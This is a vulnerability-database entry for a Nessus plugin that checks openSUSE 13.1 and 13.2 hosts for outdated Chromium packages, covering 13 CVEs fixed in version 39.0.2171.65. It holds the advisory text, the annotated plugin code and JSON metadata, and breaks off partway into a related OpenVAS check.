ID OPENSUSE-2014-764.NASL Type nessus Reporter This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2014-12-15T00:00:00
Description
chromium was updated to version 39.0.2171.65 to fix 13 security
issues.
These security issues were fixed :
Use-after-free in pepper plugins (CVE-2014-7906).
Buffer overflow in OpenJPEG before r2911 in PDFium, as
used in Google Chrome before 39.0.2171.65, al...
(CVE-2014-7903).
Uninitialized memory read in Skia (CVE-2014-7909).
Unspecified security issues (CVE-2014-7910).
Integer overflow in media (CVE-2014-7908).
Integer overflow in the opj_t2_read_packet_data function
in fxcodec/fx_libopenjpeg/libopenjpeg20/t2....
(CVE-2014-7901).
Use-after-free in blink (CVE-2014-7907).
Address bar spoofing (CVE-2014-7899).
Buffer overflow in Skia (CVE-2014-7904).
Use-after-free vulnerability in the CPDF_Parser
(CVE-2014-7900).
Use-after-free vulnerability in PDFium allows DoS
(CVE-2014-7902).
Flaw allowing navigation to intents that do not have the
BROWSABLE category (CVE-2014-7905).
Double-free in Flash (CVE-2014-0574).
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2014-764.
#
# The text description of this plugin is (C) SUSE LLC.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration block. It runs only when the scanner sets `description`;
# it declares the plugin's metadata and then leaves through exit(0) at the
# end of the block, so no host data is read or evaluated in this branch.
if (description)
{
# Plugin identity and revision bookkeeping.
script_id(79997);
script_version("1.4");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
# The 13 CVE identifiers named in the advisory text below.
script_cve_id("CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7900", "CVE-2014-7901", "CVE-2014-7902", "CVE-2014-7903", "CVE-2014-7904", "CVE-2014-7905", "CVE-2014-7906", "CVE-2014-7907", "CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7910");
script_name(english:"openSUSE Security Update : chromium (openSUSE-SU-2014:1626-1)");
script_summary(english:"Check for the openSUSE-2014-764 patch");
script_set_attribute(
attribute:"synopsis",
value:"The remote openSUSE host is missing a security update."
);
# The description is the advisory text as extracted (see the file header).
# Two entries are cut short in it ("al...", "t2....") and two words are run
# together ("Chromebefore", "infxcodec"); the string is reported text and is
# left untouched. Consult the individual CVE records for the full wording.
script_set_attribute(
attribute:"description",
value:
"chromium was updated to version 39.0.2171.65 to fix 13 security
issues.
These security issues were fixed :
- Use-after-free in pepper plugins (CVE-2014-7906).
- Buffer overflow in OpenJPEG before r2911 in PDFium, as
used in Google Chromebefore 39.0.2171.65, al...
(CVE-2014-7903).
- Uninitialized memory read in Skia (CVE-2014-7909).
- Unspecified security issues (CVE-2014-7910).
- Integer overflow in media (CVE-2014-7908).
- Integer overflow in the opj_t2_read_packet_data function
infxcodec/fx_libopenjpeg/libopenjpeg20/t2....
(CVE-2014-7901).
- Use-after-free in blink (CVE-2014-7907).
- Address bar spoofing (CVE-2014-7899).
- Buffer overflow in Skia (CVE-2014-7904).
- Use-after-free vulnerability in the CPDF_Parser
(CVE-2014-7900).
- Use-after-free vulnerability in PDFium allows DoS
(CVE-2014-7902).
- Flaw allowing navigation to intents that do not have the
BROWSABLE category (CVE-2014-7905).
- Double-free in Flash (CVE-2014-0574)."
);
# References: twelve openSUSE Bugzilla entries followed by the
# opensuse-updates mailing-list announcement.
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906317"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906318"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906319"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906320"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906321"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906322"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906323"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906324"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906326"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906327"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906328"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=906330"
);
script_set_attribute(
attribute:"see_also",
value:"https://lists.opensuse.org/opensuse-updates/2014-12/msg00048.html"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected chromium packages."
);
# One CVSS v2 base vector for the plugin as a whole: network vector, low
# complexity, no authentication, complete C/I/A impact.
# NOTE(review): presumably the worst case across the bundled CVEs rather than
# a per-CVE score - confirm before using it to rank the individual issues.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
# "local": the finding is derived from the host's own package inventory
# (see the required KB keys below), not from probing a network service.
script_set_attribute(attribute:"plugin_type", value:"local");
# Package CPEs for the nine RPM names this plugin evaluates, then the two
# operating-system CPEs (openSUSE 13.1 and 13.2).
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:chromedriver");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:chromedriver-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:chromium");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:chromium-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:chromium-debugsource");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:chromium-desktop-gnome");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:chromium-desktop-kde");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:13.1");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:13.2");
# The patch date (vendor fix) precedes the plugin date (scanner coverage) by
# two weeks; hosts scanned in between would not have been flagged by this check.
script_set_attribute(attribute:"patch_publication_date", value:"2014/12/01");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/12/15");
script_end_attributes();
# ACT_GATHER_INFO: the plugin is registered in the information-gathering category.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"SuSE Local Security Checks");
# Scheduling prerequisites: ssh_get_info.nasl must run first, and the four KB
# keys below must be present. Without working credentials those keys are not
# populated and the plugin yields no result for the host - an empty result
# from an uncredentialed scan is not evidence that the update is installed.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Pre-flight gates. Every failed gate hands a reason code to audit() (from
# audit.inc), which is expected to end the plugin with that reason, so the
# order of the gates decides which reason an out-of-scope host is given.

# Gate 1: credentialed (local) checks must have been enabled for this host.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}

# Gate 2: the host must be openSUSE. A missing release string, or one that
# starts with SLED/SLES (the enterprise products), is out of scope.
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)")
{
  audit(AUDIT_OS_NOT, "openSUSE");
}

# Gate 3: only openSUSE 13.1 and 13.2 are covered by this advisory.
if (release !~ "^(SUSE13\.1|SUSE13\.2)$")
{
  audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "13.1 / 13.2", release);
}

# Gate 4: the installed-RPM inventory must have been collected.
if (!get_kb_item("Host/SuSE/rpm-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Gate 5: the CPU architecture must be known and one of the x86 variants
# listed here; hosts on any other architecture are audited out, not flagged.
ourarch = get_kb_item("Host/cpu");
if (!ourarch)
{
  audit(AUDIT_UNKNOWN_ARCH);
}
if (ourarch !~ "^(i586|i686|x86_64)$")
{
  audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
}
# The nine RPM names shipped by this update, in the order they are checked.
chromium_pkgs = make_list(
  "chromedriver",
  "chromedriver-debuginfo",
  "chromium",
  "chromium-debuginfo",
  "chromium-debugsource",
  "chromium-desktop-gnome",
  "chromium-desktop-kde",
  "chromium-ffmpegsumo",
  "chromium-ffmpegsumo-debuginfo"
);

# Counts the package checks that came back positive.
flag = 0;

# Compare each package against the fixed build for its release:
#   openSUSE 13.1 -> 39.0.2171.65-58.4
#   openSUSE 13.2 -> 39.0.2171.65-4.4
# rpm_check() comes from rpm.inc; presumably it is true when the installed
# package is older than the reference - confirm against rpm.inc. Only RPMs
# with these names in the collected package list are evaluated, so a Chromium
# installed by other means is outside what this check can see.
foreach chromium_pkg (chromium_pkgs)
{
  if (rpm_check(release:"SUSE13.1", reference:chromium_pkg + "-39.0.2171.65-58.4")) flag++;
}
foreach chromium_pkg (chromium_pkgs)
{
  if (rpm_check(release:"SUSE13.2", reference:chromium_pkg + "-39.0.2171.65-4.4")) flag++;
}

if (!flag)
{
  # Nothing matched: tell "packages present and up to date" apart from
  # "none of the packages installed" using the list of tests performed.
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "chromedriver / chromedriver-debuginfo / chromium / etc");
}
else
{
  # At least one outdated package: raise the finding on port 0, attaching
  # the per-package report when the configured verbosity asks for detail.
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
{"id": "OPENSUSE-2014-764.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : chromium (openSUSE-SU-2014:1626-1)", "description": "chromium was updated to version 39.0.2171.65 to fix 13 security\nissues.\n\nThese security issues were fixed :\n\n - Use-after-free in pepper plugins (CVE-2014-7906).\n\n - Buffer overflow in OpenJPEG before r2911 in PDFium, as\n used in Google Chromebefore 39.0.2171.65, al...\n (CVE-2014-7903).\n\n - Uninitialized memory read in Skia (CVE-2014-7909).\n\n - Unspecified security issues (CVE-2014-7910).\n\n - Integer overflow in media (CVE-2014-7908).\n\n - Integer overflow in the opj_t2_read_packet_data function\n infxcodec/fx_libopenjpeg/libopenjpeg20/t2....\n (CVE-2014-7901).\n\n - Use-after-free in blink (CVE-2014-7907).\n\n - Address bar spoofing (CVE-2014-7899).\n\n - Buffer overflow in Skia (CVE-2014-7904).\n\n - Use-after-free vulnerability in the CPDF_Parser\n (CVE-2014-7900).\n\n - Use-after-free vulnerability in PDFium allows DoS\n (CVE-2014-7902).\n\n - Flaw allowing navigation to intents that do not have the\n BROWSABLE category (CVE-2014-7905).\n\n - Double-free in Flash (CVE-2014-0574).", "published": "2014-12-15T00:00:00", "modified": "2014-12-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/79997", "reporter": "This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://lists.opensuse.org/opensuse-updates/2014-12/msg00048.html", "https://bugzilla.opensuse.org/show_bug.cgi?id=906327", "https://bugzilla.opensuse.org/show_bug.cgi?id=906322", "https://bugzilla.opensuse.org/show_bug.cgi?id=906330", "https://bugzilla.opensuse.org/show_bug.cgi?id=906321", "https://bugzilla.opensuse.org/show_bug.cgi?id=906318", "https://bugzilla.opensuse.org/show_bug.cgi?id=906317", "https://bugzilla.opensuse.org/show_bug.cgi?id=906323", "https://bugzilla.opensuse.org/show_bug.cgi?id=906324", "https://bugzilla.opensuse.org/show_bug.cgi?id=906319", "https://bugzilla.opensuse.org/show_bug.cgi?id=906326", "https://bugzilla.opensuse.org/show_bug.cgi?id=906328", "https://bugzilla.opensuse.org/show_bug.cgi?id=906320"], "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "type": "nessus", "lastseen": "2021-01-20T12:28:05", "edition": 18, "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310851108", "OPENVAS:1361412562310804892", "OPENVAS:1361412562310804894", "OPENVAS:1361412562310842037", "OPENVAS:1361412562310804797", "OPENVAS:1361412562310804893", "OPENVAS:1361412562310850624", "OPENVAS:1361412562310804794", "OPENVAS:1361412562310804793", "OPENVAS:1361412562310121299"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:0725-1", "OPENSUSE-SU-2014:1444-1", "SUSE-SU-2014:1442-1", "OPENSUSE-SU-2014:1626-1"]}, {"type": "freebsd", "idList": ["D395E44F-6F4F-11E4-A444-00262D5ED8EE"]}, {"type": "nessus", "idList": ["GOOGLE_CHROME_38_0_2125_122.NASL", "GENTOO_GLSA-201412-13.NASL", "MACOSX_GOOGLE_CHROME_39_0_2171_65.NASL", "REDHAT-RHSA-2014-1894.NASL", "MACOSX_ADOBE_AIR_15_0_0_356.NASL", "UBUNTU_USN-2410-1.NASL", "FREEBSD_PKG_D395E44F6F4F11E4A44400262D5ED8EE.NASL", 
"SMB_KB3004150.NASL", "GOOGLE_CHROME_39_0_2171_65.NASL", "REDHAT-RHSA-2014-1852.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:DCCF6E08CBB78DDE988D0C3CB0E04C1A"]}, {"type": "archlinux", "idList": ["ASA-201411-11", "ASA-201411-26"]}, {"type": "redhat", "idList": ["RHSA-2014:1894", "RHSA-2014:1852"]}, {"type": "ubuntu", "idList": ["USN-2410-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31430", "SECURITYVULNS:VULN:14118"]}, {"type": "cve", "idList": ["CVE-2014-7907", "CVE-2014-7902", "CVE-2014-7906", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7900", "CVE-2014-7904", "CVE-2014-7909", "CVE-2014-7901", "CVE-2014-7899"]}, {"type": "gentoo", "idList": ["GLSA-201412-13", "GLSA-201411-06"]}, {"type": "hackerone", "idList": ["H1:37240"]}, {"type": "exploitdb", "idList": ["EDB-ID:34765", "EDB-ID:34895", "EDB-ID:36503", "EDB-ID:35115", "EDB-ID:36504", "EDB-ID:34777", "EDB-ID:35146", "EDB-ID:34879", "EDB-ID:34839", "EDB-ID:34766"]}], "modified": "2021-01-20T12:28:05", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2021-01-20T12:28:05", "rev": 2}, "vulnersScore": 8.6}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-764.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79997);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0574\", \"CVE-2014-7899\", \"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\", \"CVE-2014-7904\", \"CVE-2014-7905\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-SU-2014:1626-1)\");\n script_summary(english:\"Check for 
the openSUSE-2014-764 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"chromium was updated to version 39.0.2171.65 to fix 13 security\nissues.\n\nThese security issues were fixed :\n\n - Use-after-free in pepper plugins (CVE-2014-7906).\n\n - Buffer overflow in OpenJPEG before r2911 in PDFium, as\n used in Google Chromebefore 39.0.2171.65, al...\n (CVE-2014-7903).\n\n - Uninitialized memory read in Skia (CVE-2014-7909).\n\n - Unspecified security issues (CVE-2014-7910).\n\n - Integer overflow in media (CVE-2014-7908).\n\n - Integer overflow in the opj_t2_read_packet_data function\n infxcodec/fx_libopenjpeg/libopenjpeg20/t2....\n (CVE-2014-7901).\n\n - Use-after-free in blink (CVE-2014-7907).\n\n - Address bar spoofing (CVE-2014-7899).\n\n - Buffer overflow in Skia (CVE-2014-7904).\n\n - Use-after-free vulnerability in the CPDF_Parser\n (CVE-2014-7900).\n\n - Use-after-free vulnerability in PDFium allows DoS\n (CVE-2014-7902).\n\n - Flaw allowing navigation to intents that do not have the\n BROWSABLE category (CVE-2014-7905).\n\n - Double-free in Flash (CVE-2014-0574).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906321\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906322\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906326\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906328\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906330\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-12/msg00048.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-debuginfo-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debuginfo-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debugsource-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
reference:\"chromium-desktop-gnome-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-kde-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-debuginfo-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-gnome-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-kde-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-39.0.2171.65-4.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "79997", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "cpe:/o:novell:opensuse:13.2", 
"p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "p-cpe:/a:novell:opensuse:chromium-desktop-kde"], "scheme": null}
{"openvas": [{"lastseen": "2020-01-31T18:39:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2014-12-13T00:00:00", "id": "OPENVAS:1361412562310850624", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850624", "type": "openvas", "title": "openSUSE: Security Advisory for chromium (openSUSE-SU-2014:1626-1)", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850624\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-12-13 05:53:58 +0100 (Sat, 13 Dec 2014)\");\n script_cve_id(\"CVE-2014-0574\", \"CVE-2014-7899\", \"CVE-2014-7900\", \"CVE-2014-7901\",\n \"CVE-2014-7902\", \"CVE-2014-7903\", \"CVE-2014-7904\", \"CVE-2014-7905\",\n \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\",\n \"CVE-2014-7910\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for chromium (openSUSE-SU-2014:1626-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"chromium was updated to version 39.0.2171.65 to fix 13 security issues.\n\n These security issues were fixed:\n\n - Use-after-free in pepper plugins (CVE-2014-7906).\n\n - Buffer overflow in OpenJPEG before r2911 in PDFium, as used in Google\n Chromebefore 39.0.2171.65, al... (CVE-2014-7903).\n\n - Uninitialized memory read in Skia (CVE-2014-7909).\n\n - Unspecified security issues (CVE-2014-7910).\n\n - Integer overflow in media (CVE-2014-7908).\n\n - Integer overflow in the opj_t2_read_packet_data function\n infxcodec/fx_libopenjpeg/libopenjpeg20/t2.... 
(CVE-2014-7901).\n\n - Use-after-free in blink (CVE-2014-7907).\n\n - Address bar spoofing (CVE-2014-7899).\n\n - Buffer overflow in Skia (CVE-2014-7904).\n\n - Use-after-free vulnerability in the CPDF_Parser (CVE-2014-7900).\n\n - Use-after-free vulnerability in PDFium allows DoS (CVE-2014-7902).\n\n - Flaw allowing navigation to intents that do not have the BROWSABLE\n category (CVE-2014-7905).\n\n - Double-free in Flash (CVE-2014-0574).\");\n\n script_tag(name:\"affected\", value:\"chromium on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:1626-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", 